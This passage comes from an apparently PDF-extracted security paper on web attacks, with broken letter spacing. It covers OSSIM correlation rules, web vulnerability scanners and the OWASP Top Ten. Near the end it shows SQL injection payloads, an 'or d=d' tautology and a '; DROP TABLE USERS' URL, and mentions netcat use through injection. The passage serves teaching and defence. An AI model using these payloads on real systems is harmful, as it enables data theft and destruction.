a popul ar open sour ce I nt r usi on Det ect i on Syst em, snor t i s abl e
t o det ect t hat code r ed, an I I S t ar get ed wor m i s r unni ng r ampant
on t he DMZ. Due t o t he sheer number of host s t hat are f ound
wi t hi n t he DMZ a secur i t y anal yst can qui ckl y f i nd her sel f i n a
t enuous posi t i on of not knowi ng whi ch host s t o pr ot ect f i r st .
Though no secur i t y anal yst shoul d condone t he spreadi ng of
wor ms i n t hei r net wor k, i t i s saf e t o say t hat Wi ndows I I Svul ner abi l i t i es wi l l have l i t t l e t o no af f ect on a UNI X or Li nux
based ser ver . At t he same t i me as t hi s code r ed at t ack i s
t aki ng pl ace agai nst a UNI X ser ver f ar m i t al so has t he abi l i t y
t o spr ead t o the cor por at e i nt r anet subnet whi ch does cont ai n
unpatched Wi ndows Ser ver s r unni ng I I S. Appl yi ng hi gher
pr i or i t i es f or t hi s behavi or i n a wi ndows envi r onment al l ows a
secur i t y anal yst t o r espond mor e appr opr i at el y of t en decr easi ng
t he t i me f or r emedi at i on.
To proper l y pr i or i t i ze OSSI M provi des a met hod t o
pr i or i t i ze t hr eat l evel s. We wi l l di ve deeper i nt o t hese
di r ect i ves i n a subsequent sect i on.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 21/47
Web Based At t acks
J ust i n Cr i st 20
Reliability
Rel i abi l i t y speaks speci f i cal l y t o t he l i kel i hood t hat an al er t
whi ch i s l ogged by OSSI M i s wor t hy of an al ar m. An al er t i s
si mpl y any event t hat i s l ogged f r om one of t he many devi ces
whi ch l ogs t o OSSI M. Thi s coul d be a l og r ecei ved f r om a
r out er , f i r ewal l , or host on t he net wor k. Rel i abi l i t y st ar t s t o
t ake i nt o account pat t er ns and char act er i st i cs i n t he event s
t hat ar e bei ng l ogged. For exampl e, i f a wi ndows wor kst at i on
connect s t o on aver age of 20- 30 host s on TCP 135 dur i ng a gi ven
hour t hi s mi ght be consi dered normal based upon t he dut i es of
t hi s wi ndows host . However , i f t hi s same syst em begi ns t o
connect t o 400- 600 host s i n a hal f hour i t i s r easonabl e t o
suspect t he pr esence of a mi sconf i gur at i on or even per haps t he
presence of a compromi sed host .
Rel i abi l i t y of an al ar m speaks t o t he l i kel i hood t hat t he
al ar m i s accur at el y depi ct i ng a cer t ai n scenar i o whi ch mor e
t i mes t han not need t o be act ed upon.
Al arms wi t hi n OSSI M can be t r i gger ed af t er a cer t ai n number
of l i ke event s have been r ecei ved. Coupl ed wi t h t hei r asset
val ues, and pr i or i t i es, a r i sk rat i ng can be comput ed.
Power of Correlation
As ment i oned bef ore di r ect i ves are used wi t hi n OSSI M.
Di r ect i ves are i n essence r ul es or f or mul as whi ch ar e used t o
cal cul at e t he pot ent i al cl assi f i cat i on or meani ng of a ser i es of
r ecei ved al er t s.
For t hose f ami l i ar wi t h CI SCO based ACLs, di r ect i ves have a
somewhat si mi l ar nomencl at ur e whi ch use numbers as i dent i f i ers.
- Gener i c ossi m: 1- 2999
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 22/47
Web Based At t acks
J ust i n Cr i st 21
- At t ack cor r el at i on: 3000- 5999- Vi r us & Wor ms: 6000- 8999- Web at t ack corr el at i on: 9000- 11999- DoS: 12000- 14999- Por t scan/ scan: 15000- 17999- Behavi our anomal i es: 18000- 20999
- Net work abuse & er r or : 21000- 23999
- Troj ans: 24000- 26999
- Mi scel aneous: 27000- 34999
Di r ecti ves al l st ar t wi t h an i ni t i al r ul e t hat at t empt s to
mat ch t he di r ect i ve and begi n t he event cor r el at i on. For
exampl e, gi ven t he exampl e above wher e a wi ndows host connect s
t o 400 wi ndows syst ems on por t 135.
We wi l l i l l ust r at e t hi s wi t h a det ector r ul e.
<rule type = “detector” name=”Potentially Suspicious”
reliability = “1” occurrence=”500” from=”ANY” to=”ANY”
port_to=”135,137,139,445” plugin id=”50051” plugin_sid=”ANY”
time_out=360>
For t hi s par t i cul ar r ul e we mat ch agai nst anyt hi ng goi ng t o
st andar d wi ndows por t whi ch exceeds 500 occur r ences or
connect i ons i n a one hour t i me span.
Detector rules ar e r ul es t hat ar e r ecei ved f r om agent s whi ch ar e
r ecor di ng t o OSSI M. Exampl es may i ncl ude apache, snor t , f W- 1,
et c. The power of OSSI M and cor r el at i on i s t he abi l i t y t o
r ecei ve i nf or mat i on f r om di spar at e sour ces t o ar r i ve at a deeper
concl usi on or under st andi ng of what i s occur r i ng i n a net wor k.
Bel ow we have broken down t he maj or cat egor i es wi t hi n a
di r ect i ve.
Name f i el d si mpl y repr esent s t he pr oper name of t he di r ect i ve.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 23/47
Web Based At t acks
J ust i n Cr i st 22
Reliability i s based upon t he l i kel i hood t hat t hi s event i snot ewor t hy. Agai n t he scal e of 0 – 5 i s used.
Occurrence i ndi cat es how many t i mes a par t i cul ar event wi l l havet o occur bef or e t he di r ect i ve i s mat ched.
From i ndi cat es t he sour ce of t he event .To i ndi cat es t he dest i nat i on of t he event .
Ports_to i ndi cat e t he sour ce por t of t he event .Ports_from i s not l i st ed her e but can be def i ned f or sour ce por tmat chi ng.
Event s whi ch occur by t hemsel ves of t ent i mes are not par t i cul ar l ynotewort hy; however , when mul t i pl e sour ces are r ecor di ng si mi l arbehavi or s whi ch di f f er f r om t he nor m behavi or s, OSSI M i s abl e t oal er t secur i t y anal ysts of t hi s pot ent i al l y i nt er est i ng
act i vi t y. The power t hat cor r el at i on can of f er a secur i t yanal yst shoul d not be under est i mated.
The f ol l owi ng scr een shot shows t he st r uct ure vi sual l y of adi r ect i ve t hat i s bui l t wi t hi n OSSI M.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 24/47
Web Based At t acks
J ust i n Cr i st 23
Bel ow you wi l l f i nd a screen shot t aken f r om OSSI M. net whi chi ndi cat es the l i kel i hood of a wi ndows wor m. Not i ce t hecor r el at i on l evel , r i sk r at i ng, and al ar m.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 25/47
Web Based At t acks
J ust i n Cr i st 24
Si mi l ar l y t he f ol l owi ng scr eens can be used t o cor r obor at e anyal ar ms whi ch may be sent . Anal yst s have t he abi l i t y t odet er mi ne t hr ough thi s snapshot whi ch host s ar e responsi bl e f orsendi ng and r ecei vi ng t he maj or i t y of t he net wor k t r af f i c.Ot her scr eens i ndi cat e t he t i mi ng of net wor k usage. Thi si nf or mat i on by i t sel f may not be par t i cul ar l y t el l i ng, however ,wi t h t he use of t he pr evi ous scr een, cer t ai n hypot hesi s begi n t ot ake hol d.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 26/47
Web Based At t acks
J ust i n Cr i st 25
The f ol l owi ng di agram i ndi cat es l oad at par t i cul ar t i mes of t heday on a net work. These di agr ams can i ndi cat e net work abuse,mi sconf i gur at i ons, worms, or even normal use. These data poi nt scan be t r ended over t i me and compar ed t o pr evi ous days/ mont hsf or pat t er ns.
Proprietary Detection/Prevention Tools:
Ther e ar e many school s of t hought when i t comes t o
deci di ng bet ween a capabl e open sour ce t ool and a pr opr i et ary
t ool . Regardl ess of your st ance t her e are many pr oven t ool s
t hat of f er bot h commer ci al suppor t and suppor t f r om t he open
sour ce communi t y. Bel ow we wi l l hi ghl i ght a f ew of t hese.
Watchfire AppScan
Whi l st t he maj or i t y of appl i cat i on scanni ng t ool s of f er t he
abi l i t y t o scan f or codi ng vul ner abi l i t i es af t er an appl i cat i on
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 27/47
Web Based At t acks
J ust i n Cr i st 26
has been bui l t , Wat chf i r e’ s AppScan di st i ngui shes i t sel f i n t hat
i t can be used t hr oughout t he sof t war e devel opment l i f ecycl e.
I t i s not l i mi t ed t o use af t er an appl i cat i on has been
compl et el y bui l t . The abi l i t y t o l ever age AppScan dur i ng t he
devel opment l i f ecycl e enabl es secur i t y consci ous devel oper s t o
f i x secur i t y i ssues ear l i er i n devel opment t hus savi ng
consi der abl e post f i x dol l ar s.
Some of t he mor e common checks t hat AppScan checks f or
i ncl ude cross si t e scr i pt i ng, pr i vi l ege escal at i on, sessi on
st at e moni t or i ng, HTTP r esponse spl i t t i ng, par amet er t amper i ng,
hi dden f i el d mani pul at i on, backdoor s/ debug opt i ons, and buf f er
over f l ows. What di f f er ent i at es AppScan f r om many of t he ot her
pr opr i et ar y and open sour ce t ool s avai l abl e i s t he wi de var i et y
of usef ul r epor t s t hat ar e gener at ed. Wi t hi n t he AppScan t ool
r emedi at i on r eport s, execut i ve dashboar ds, and compl i ance
r epor t i ng ar e al l of f er ed. These f eat ur es ar e i ncreasi ngl y
val uabl e f or l ar ger mor e r i sk aver se or gani zat i ons whi ch ar e
subj ect t o compl i ance, pr i vacy, and regul at or y st andar ds.
AppScan i s provi ded as a Wi ndows based GUI whi ch has
been i nt ui t i vel y l ai d out . A l ogi cal di r ector y st r uctur e i s
l ai d out f r om l ef t t o r i ght . I ssues, Remedi at i on, and
Appl i cat i on dat a ador n t he l ef t si de and ar e f eat ur ed mai n
cat egor i es. Fr om l ef t t o r i ght t he user may dr i l l down
successi vel y
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 28/47
Web Based At t acks
J ust i n Cr i st 27
Figure 1: AppScan
Figure 2
Figure 2: AppScan
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 29/47
Web Based At t acks
J ust i n Cr i st 28
Figure 2: AppScan
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 30/47
Web Based At t acks
J ust i n Cr i st 29
WebInspect
WebI nspect i s anot her ext r emel y popul ar web
appl i cat i on scanner amongst many secur i t y pr of essi onal s.
WebI nspect appl i cat i on secur i t y assessment t ool s al l ow f or t hei dent i f i cat i on of known and unknown vul ner abi l i t i es, WebI nspect
can al so check t o ensure t hat a web appl i cat i on are secur ed
proper l y, at t empt common web at t acks such as par amet er
subst i t ut i on/ i nj ect i on, cross si t e scr i pt i ng, di r ect ory
t r aversal at t acks, and much more.
WebI nspect f eat ur es a si mi l ar user i nt er f ace as t he
one f eat ur ed i n AppScan. However , i t does of f er t he abi l i t y t oi nt er act wi t h t he r epor t i ng t ool s i n r eal t i me as scans ar e
bei ng per f or med. I nt er act i ve r epor t s ar e al so avai l abl e whi ch
al l ow f or dr i l l i ng down i nt o par t i cul ar ar eas of concer n.
Figure 3: WebInspect
Popul ar and usef ul pr e- bundl ed t ool s ar e f avor i t es wi t h
WebI nspect . Amongst t he of f ered t ool s are:
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 31/47
Web Based At t acks
J ust i n Cr i st 30
• A Cooki e Cr uncher whi ch al l ows a secur i t y pr act i t i oner t o
assess t he st r engt h of t he cooki es used i n br owsi ng
sessi ons.
• An SPI Proxy al l ows t he secur i t y assessor t o vi ew each and
every br owser r equest and ser ver r esponse.
• WebBr ut e al l ows f or br ut e f or ci ng l ogi n f or ms.
• WebDi scover y al l ows f or scanni ng of web ser vi ces and
cor r el at es to t hem t o speci f i c por t s f or l at er
i nvest i gat i on.
Bot h of t hese t ool s have been ext r emel y popul ar amongst
both secur i t y consul t i ng f i r ms and sof t ware devel opment houses
whi ch pr ovi de web pr esence sof t ware. As f or whi ch one t o use,
bot h compani es of f er a f r ee t r i al of f er .
Open Source Prevention Tools:
Nikto
Ni kt o i s ar guabl y the most popul ar web ser ver scanner
avai l abl e i n t he open sour ce communi t y. Compr ehensi vel y
scanni ng f or over 3250 known danger ous f i l es on as many as 600
ser ver s Ni kt o has i t s name f i r ml y i mbedded amongst many seasoned
secur i t y pr of essi onal s as one of t he pr emi er web vul ner abi l i t y
scanners.
Ni kt o i s a command l i ne dr i ve t ool whi ch f eat ur es a wi de
var i et y of opt i ons i ncl udi ng ant i I DS or evasi on scanni ng
t act i cs. These ar e hel pf ul when t est i ng I DS depl oyment s f orat t ack si gnatur es and I DS r esponses.
As wi t h t he pr opr i et ar y tool s ment i oned ear l i er Ni kt o can
be used as a pr event at i ve t ool whi ch can t i p of f devel oper s of
i nsecur e conf i gur at i ons bef or e cr i t i cal web ser vi ces ar e
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 32/47
Web Based At t acks
J ust i n Cr i st 31
publ i shed t o t he Wor l d Wi de Web or even t o ext r anet par t ners.
Ni kt o si gnat ur e updat es are si mi l ar t o t hose f eat ur es i n many
popul ar ant i vi r us t ool s; however , t hey ar e updat ed by t he open
source communi t y.
Figure 4: Nikto
WebScarab
WebScarab i s a j ava appl i cat i on whi ch has been publ i shed by
t he OWASP proj ect , an open source l ed communi t y whi ch we wi l l
speak i n dept h about l at er . The WebScarab f r amework i s of t en
used t o di ssect appl i cat i ons whi ch communi cat e over HTTP or
HTTPS. Typi cal uses i ncl ude l ocat i ng, i dent i f yi ng, and al t er i ng
post s and request s made by a web browser bef or e t hey are sent
of f t o a web server . These opt i ons al l ow a user t o sl ow down
t he communi cat i on bet ween a web cl i ent and server so t hat
r equest s and r esponses can be anal yzed pr oper l y. Of t ent i mes
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 33/47
Web Based At t acks
J ust i n Cr i st 32
dur i ng t hi s anal ysi s t he i mpr oper handl i ng of credent i al s,
l ogi ns, cooki es, et c ar e di scover ed t hus al l owi ng a user t o
subver t t he secur i t y cont r ol s i nher ent wi t hi n t he web
appl i cat i ons bei ng anal yzed. WebScar ab i s most commonl y used by
appl i cat i on devel oper s who wi sh t o more compl et el y secur e t he
web appl i cat i ons t hey ar e servi ng.
WebScarab f eat ur es ar e pl ent i f ul , however t he most commonl y
used i ncl ude:
• Proxy: Abl e t o obser ve bot h encr ypt ed ( HTTPS) and
unencrypt ed t r af f i c ( HTTP) . Encrypt ed t r af f i c i s vi ewed by
est abl i shi ng a second SSL t unnel between t he pr oxy and t he
appl i cat i on web server .
• SessionID Analysis: a var i et y of cooki es can be capt ur ed
and anal yzed t o vi sual l y determi ne t he randomness and
unpr edi ct abi l i t y whi ch shoul d be i nher ent i n al l cooki e
gener at i on.
• Manual Request: Edi t i ng and r epl ay of pr evi ous r equest s t o
web appl i cat i ons can be vi ewed and mani pul at ed.
• Reveal Hidden Fields: WebScarab al l ows a user t o vi ew
hi dden f i el ds wi t hi n t he web pr esent at i on f i el ds f or
mani pul at i on, del et i on, or r econnai ssance.
• Spider: Al l ows f or anal ysi s on t he web appl i cat i on whi ch
may r eveal addi t i onal l i nks t hat ar e not known i ni t i al l y.
• Beanshell: Thi s i s a f eat ur e whi ch al l ows f or t he
scr i pt i ng of ar bi t r ar y j ava code on r equest s and or
r esponses r ecei ved by t he web cl i ent or server .
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 34/47
Web Based At t acks
J ust i n Cr i st 33
Figure 5: WebScarab: Editing of web post
Figure 6: WebScarab: Directory structure view of webpage
Secure Coding
Awareness of t he i mport ance of web appl i cat i on secur i t y has
j umped si gni f i cant l y i n j ust a f ew year s… 93 percent f el t t hat
secur e appl i cat i on devel opment was more of a pr i or i t y now t han
t hree year s ago( Symant ec, 2006) .
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 35/47
Web Based At t acks
J ust i n Cr i st 34
“Secur i t y t r ai ni ng i s at t he hear t of wr i t i ng good code”,
wr i t es J ohn Hei mann of Or acl e(Hei mann, 2006) . For
or gani zat i ons t hat make avai l abl e i nt er net connect ed syst ems t o
t he publ i c f or use, secur i t y t r ai ni ng i s a must have and i s
of t en over l ooked i n many devel oper s backgr ounds. “I t ’ s an
unf or t unat e f act t hat most devel oper s ar e not r equi r ed t o l ear n
secur e codi ng pr act i ces i n school ”, not ed Hei mann. Too of t en
wi t hi n academi a and wi t hi n t he cor por at e wor l d t he f ocus i n
educat i ng devel oper s i s on cr eat i ng ef f i ci ent bug f r ee code.
Secur i t y checks are opt i onal at best ar e rarel y consi der ed.
Ref erences t o secur e codi ng methodol ogi es and pr act i ces can
be f ound her e:
ht t p: / / www. mi cr osof t . com/ uk/ msdn/ secur i t y/ devel oper _secur i t
y. mspx
As an exampl e, most progr ammers woul d consi der t he
i mpl ement at i on of a speci f i c check on t he l engt h of web f or m
i nput t o be unnecessar y and wast ef ul of val uabl e CPU cycl e
t i mes. Unf or t unat el y f or ever y pr ogr ammer out t her e t hat i s
unawar e of secur e codi ng pr act i ces t her e ar e hacker s out t her e
t hat ar e not onl y awar e but capabl e of sear chi ng f or and t aki ng
advant age of t hese l oophol es l ef t behi nd by devel oper s.
OWASP
The Open Web Appl i cat i on Secur i t y Pr oj ect commonl y r ef er r ed
t o as OWASP i s an open sour ce pr oj ect dedi cated t o the di scover y
and f i ght i ng of i nsecur e sof t war e( Wi ki pedi a) .
The open sour ce OWASP communi t y i s made up of cor por at i ons,
educat i onal ent i t i es, and devel oper s and secur i t y pr act i t i oner s
l ocat ed on al l seven cont i nent s. They ar e best known f or t hei r
cr eat i on of ar t i cl es, met hodol ogi es, document at i on, and t ool s
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 36/47
Web Based At t acks
J ust i n Cr i st 35
whi ch ar e al l f r eel y avai l abl e f or use t he devel opment and
t est i ng of secur e appl i cat i on code( OWASP, 2007) .
Some of t he not abl e tool s t hat OWASP has pr oduced i ncl ude
Web Goat , a web appl i cat i on penet r at i on t est i ng envi r onment ,
WebScarab, ment i oned ear l i er , and t he OWASP. NET t ool s set . Most
f amousl y t hough OWASP i s r esponsi bl e f or produci ng t he OWASP Top
Ten, whi ch i s an appl i cat i on secur i t y awar eness document . I n
t he next sect i on we wi l l hi ghl i ght t he Top Ten, and t he
vul ner abi l i t i es most of t en f ound wi t hi n web appl i cat i ons.
OWASP – Top Ten
The OWASP Top Ten i s of t en consi dered t he def act o st andar dwhen l ooki ng at many audi t cont r ol s and secur i t y f i r ms
r esponsi bl e f or assessi ng code.
Speci f i cal l y PCI or t he payment car d i ndust r y secur i t y
st andard, a st andard enf orced j oi nt l y bet ween Amer i can Expr ess,
Vi sa, Mast er Car d, and J CB r equi r es or gani zat i ons whi ch st or e or
pr ocess cr edi t card data t o i mpl ement secur e codi ng pr ocedur es
wi t hi n thei r SDLC.
Thi s r equi r ement ensur es t hat al l web appl i cat i ons
devel oped i n house ar e secur el y coded and r evi ewed f or t he
f ol l owi ng vul ner abi l i t i es( PCI and Dat a Secur i t y Compl i ance,
2007) .
Top Ten Highlights
Bef or e get t i ng i nt o a f ew speci f i c t ypes of at t ack we wi l l
di ve i nt o some of t he mor e pr omi nent t op t en vul ner abi l i t i es
f r om a hi gher l evel . I t i s i mpor t ant t o under st and t he br eadt h
of at t acks t hat ar e cover ed by t he t op t en t o t r ul y under st and
i t s val ue amongst t he devel opment communi t y.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 37/47
Web Based At t acks
J ust i n Cr i st 36
Unvalidated Input:
Unval i dat ed I nput i s def i ned as any i nf or mat i on r ecei ved
vi a web request s whi ch ar e not val i dated bef ore bei ng used by a
web appl i cat i on.
Commonl y at t acker s t ar get t hese vul ner abi l i t i es t o at t ack
backend component s t hr ough a web appl i cat i on. Usual t argets
i ncl ude t he web appl i cat i on l ayer i t sel f , t he under l yi ng OS t hat
suppor t s t he web appl i cat i on and backend dat abases whi ch of t en
cont ai n sensi t i ve cust omer i nf or mat i on, credi t car ds, soci al
secur i t y number s, and i nt el l ect ual pr oper t y.
Exampl es of unval i dat ed i nput i ncl ude cross si t e scr i pt i ngat t acks, buf f er over f l ows, and i nj ect i on f l aws.
Buf f er over f l ows ar e al so common areas of concer n when
wr i t i ng secur e appl i cat i ons. Expl oi t i ng buf f er over f l ows si mpl y
r equi r es an at t acker t o i dent i f y f i el ds i n a vul ner abl e
appl i cat i on whi ch do not per f or m bounds checki ng. Wr i t i ng
out si de t he bounds of a memory bl ock can cor r upt dat a, cr ash t he
pr ogr am, and even cr ash t he ent i r e oper at i ng syst em subj ect i ngan organi zat i on t o unnecessary downt i me.
Broken Access Control:
Anot her commonl y over l ooked vul nerabi l i t y when cr eat i ng web
appl i cat i ons ar e br oken access cont r ol s. Access i s gr ant ed t o
speci f i c aut hor i zed user s of web appl i cat i ons t o per f or m a
speci f i c f unct i on based upon t hei r need and gener al r ol e t hat
t hey ser ve. Br oken access cont r ol vul ner abi l i t i es pr ovi de ameans f or mal i ci ous users t o escal at e pr i vi l eges beyond t hei r
i nt ended per mi ssi ons. Thi s f l aw may al l ow f or t he unaut hor i zed
vi ewi ng of ot her user s account s, t he vi ewi ng of sensi t i ve
conf i gur at i on f i l es, or t he escal at i on t o t hat of a r oot user .
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 38/47
Web Based At t acks
J ust i n Cr i st 37
Broken Authentication and Session Management
I n t he r eal m of onl i ne banki ng t he sanct i t y of t he user
aut hor i zat i on/ aut hent i cat i on component i s par amount t o t he bot h
t he cust omers and t he banks wel l bei ng and r eput at i on. Wi t hout
a t est ed and pr oven saf e aut hent i cat i on model cust omer s are
unl i kel y t o use onl i ne banki ng, somet hi ng t hat saves banks
si gni f i cant amount s of money annual l y ( Lee, 2001) .
Aut hent i cat i on and sessi on management r el at e to t he di r ect
pr ocessi ng of user , appl i cat i on, or syst em aut hent i cat i on and
t he subsequent need t o manage t hese act i ve sessi ons. Wi t hout
r el i abl e aut hent i cat i on, t r ust i s l ost and account abi l i t y
escapes t he pr ocess.
Aut hent i cat i on met hods wi t h web appl i cat i ons near l y al ways
i nvol ve a user name and passwor d. Because of t hi s i t i s vi t al l y
i mpor t ant t o ensur e t hat t hese cr edent i al s ar e not easi l y
accessi bl e. Feat ur es such as passwor d r esets and f or got t en
usernames shoul d al l be pr ot ect ed and r equi r e aut hent i cat i on vi a
a passwor d hi nt , mot her s’ mi ddl e name, or some ot her
aut hent i cat i on met hod.
Commonl y over l ooked areas of weakness wi t hi n web
appl i cat i ons i ncl ude:
1. Password St r engt h – ensur e that PAM modul es or l i ke
enf or cement i s used wi t hi n t he appl i cat i on. Di ct i onar y
wor d at t acks ar e common amongst web appl i cat i ons, and
unl ess compl exi t y i s enf orced aut hent i cat i on mechani sms are
2. Password Use – Too many f ai l ed aut hent i cat i on r equest s i n a
gi ven per i od of t i me shoul d l ock or f r eeze an account f or a
gi ven per i od of t i me.
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 39/47
Web Based At t acks
J ust i n Cr i st 38
3. Passwor d Change Cont r ol s – When changi ng a passwor d users
shoul d be requi r ed t o pr ovi de bot h the ol d and new password
bef ore bei ng abl e t o change a password. Use of emai l as a
conf i r mat i on of a password change i s anot her enf orcement
mechani sm whi ch wi l l of t en pr ovi de an al er t t o an
unsuspect i ng user of someone t amper i ng wi t h t hei r l ogi n
i nf or mat i on.
4. Br owser cachi ng – nei t her Aut hent i cat i on nor sessi on dat a
shoul d be pr esent ed i n r et r i eval r equest s f r om web ser ver s.
I n addi t i on cache opt i ons wi t hi n a web appl i cat i on may
al l ow a br owser t o st ore cooki es. Thi s can be danger ous
f or comput er s whi ch ar e accessi bl e f r om i nt er net caf es,
l i br ar i es, and ot her publ i cl y accessi bl e t er mi nal s.
Cachi ng of cooki es coul d al l ow anot her unaut hor i zed user t o
pur por t anot her user t hr ough cooki e/ sessi on i d
mani pul at i on.
Injection Flaws
I nj ect i on Fl aws ar e used t o subver t t he r equi r ed
aut hent i cat i on and aut hor i zat i on pr ocess t o an Oper at i ng Syst em,
appl i cat i on, or ot her ser vi ce. Mal i ci ous user s can t ake
advant age of weaknesses i n appl i cat i ons whi ch f ai l t o f i l t er
cl i ent based commands and make syst em cal l s, use ext ernal
appl i cat i ons such as net cat , ssh, and even r un ent i r e scr i pt s.
These weaknesses can be present anyt i me an i nt er pr et er i s used
wi t hi n a web appl i cat i on; as such code must be revi ewed bef ore
pushi ng out t o pr oduct i on syst ems.
SQL i nj ect i on f l aws are some of t he most popul ar at t ack
vect ors f or hacker s as t hey can of t en r eveal enormous amount s of
sensi t i ve dat a. Cust omer i nf or mat i on, cr edi t card number s,
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 40/47
Web Based At t acks
J ust i n Cr i st 39
empl oyee i nf ormat i on, soci al secur i t y number s, and other
sensi t i ve i nf or mat i on.
SQL Injection Attack Example
As previ ousl y ment i oned SQL i nj ect i on at t acks can occur
when user i nput on t he cl i ent si de i s not f i l t er ed pr oper l y.
Escape char act er s ar e mal i ci ousl y used t o br eak away f r om t he
cur r ent l y command and i ni t i at e a new l i st eni ng st at e on t he
under l yi ng web appl i cat i on. Once t he web appl i cat i on i s i n a
new l i st eni ng st ate a new of t ent i mes unaut hor i zed SQL quer y
agai nst a back end dat abase can be per f ormed. Tabl e vi ews,
dr oppi ng tabl es, and addi ng usernames ar e al l ver y popul ar
met hods of gai ni ng unaut hor i zed access t o both appl i cat i ons and
under l i ng st or ed dat a.
The f ol l owi ng exampl e i l l ust r at es t hi s:
An at t acker who wi shes t o ret r i eve t he user names of al l
act i ve users coul d do so wi t h an appl i cat i on t hat uses an SQL
backend and one t hat does not f i l t er SQL r equest s as t he
appl i cat i on or mi ddl ewar e l ayer . For t hi s par t i cul ar exampl e auser i s wi shi ng t o l earn about t he usernames aut hor i zed t o use
an appl i cat i on.
Wi t hi n t he domai n mybank. com t he f ol l owi ng can be used t o
r et r i eve user names pr ovi ded t he t abl e names t hat are passed are
accur ate. Many t i mes i t i s easy t o guess t he t abl e names t hat
are used t o i dent i f y par amet ers such as user name, DOB, SOCSEC,
password, et c.
Exampl e:
User vi si t s: ht t p: / / www. mybank. com
When at t empt i ng t o r et r i eve t he user names of f el l ow banker s
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 41/47
Web Based At t acks
J ust i n Cr i st 40
ht t p: / / www. mybank. com/ l ogi n/ l ogi n. asp?l ogi ni d=bobsmi t h or
d=d
The gener at ed SQL st at ement i s because of t hi s passed
argument i s:
SELECT loginid, FirstName FROM User where loginid =
bobsmith or d=d
Thi s condi t i on wi l l al ways be t r ue because d al ways equal s
d. Thus al l l ogi ni d and Fi r st Name pai r s wi l l be r et ur ned
( I mper va, 2007) .
Another cl ever way to mani pul at e SQL i nj ect i on at t acks i s
t o DROP t abl es whi ch can cause i r r eparabl e harm t o an under l yi ng
database and support ed appl i cat i on.
ht t p: / / www. mybank. com/ l ogi n/ l ogi n. asp?l ogi ni d=bobsmi t h; DROP
TABLE USERS
Thi s st at ement wi l l del et e t he USERS t abl e provi ded i t
exi st s. Del et i ng t hi s USERS t abl e woul d l i kel y r ender t he
appl i cat i on usel ess as user s woul d not be abl e t o l ogi n t o t he
under l yi ng appl i cat i on( SQLCour se. com, 2006) .
SQL i nj ect i on at t acks ar e onl y l i mi t ed t o t he creat i vi t y
and r esour cef ul ness of t he at t acker . Usernames coul d be added
al ong wi t h passwor ds, bi l l i ng amount s coul d be changed, i nt er est
pai d, bal ances changed ar e al l possi bl e wi t h weak f i l t er i ng at
t he appl i cat i on and dat abase l ayer .
Unvalidated Input Example: XSS
Cr oss si t e scr i pt i ng i s an at t ack t ar get ed t owar ds t he
host i ng web appl i cat i on, under l yi ng OS, and of t en backend
dat abase. An at t acker wi l l of t en at t ack web appl i cat i ons that
do not f i l t er scr i pt s f r om f or m f i el ds submi t t ed t o web
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 42/47
Web Based At t acks
J ust i n Cr i st 41
appl i cat i ons. For exampl e, at t acker s ar e of t en abl e t o i nser t
code whi ch get s execut ed by t he user ’ s browser . Thi s code wi l l
at t empt t o st eal br owser cooki es t hat mi ght i ncl ude banki ng
sessi on dat a, passwor ds, or t he l i ke. Sessi on cooki es ar e t hen
used by t he at t acker t o emul ate a l egi t i mat e user sessi on t o a
banki ng si t e, emai l account , or t he l i ke.
The di agram bel ow i l l ust r at es t hi s r el at i onshi p between
at t acker , web appl i cat i on, and websi t e usi ng a XSS at t ack.
( Skoudi s, 2005)
Get t i ng i nt o t he t echni cal j ar gon behi nd some of t he
advanced cr oss s i t e scr i pt i ng at t acks i s beyond t he scope of
t hi s paper .
7/27/2019 Srv Www Data Sans Php Rr Papers 2053
http://slidepdf.com/reader/full/srv-www-data-sans-php-rr-papers-2053 43/47
Web Based At t acks
J ust i n Cr i st 42
A f ant ast i c ser i es of exampl es of cross si t e scr i pt i ng can
be f ound her e: ht t p: / / www. devshed. com/ c/ a/ Secur i t y/ A- Qui ck- Look-
